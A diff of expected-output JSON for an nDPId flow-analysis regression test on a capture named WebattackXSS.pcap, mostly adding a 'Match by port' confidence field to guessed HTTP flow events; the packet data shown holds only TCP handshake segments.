 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347455224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z+5AAD4G9eGsEAABwKgKMuAcAFC7QQvkAAAAAKACchDyLAAAAgQFtAQCCAoBOsQKAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347455224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4BwGoR45u0EL5aAScSA0zgAAAgQFtAQCCAoD5JV\/ATrECgEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1499347455225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347455225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z+9AAD4G9eisEAABwKgKMuAcAFC7QQvlBqEeOoAQAOXT1QAAAQEICgE6xAoD5JV\/"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347456462,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347456462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347456462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YWdAAD4GZGmsEAABwKgKMuAqAFCeBqRYAAAAAKACchB1sAAAAgQFtAQCCAoBOsU\/AAAAAAEDAwc="}
@@ -1598,17 +1598,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347465304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nSBAAD4GKLCsEAABwKgKMuCIAFBo61DCAAAAAKACchD1YAAAAgQFtAQCCAoBOs3iAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347465304,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4Ijwu80MaOtQw6AScSCVOwAAAgQFtAQCCAoD5J9XATrN4gEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1499347465305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347465305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nSFAAD4GKLesEAABwKgKMuCIAFBo61DD8LvNDYAQAOU0QwAAAQEICgE6zeID5J9X"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466317,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347466553,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347466553,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
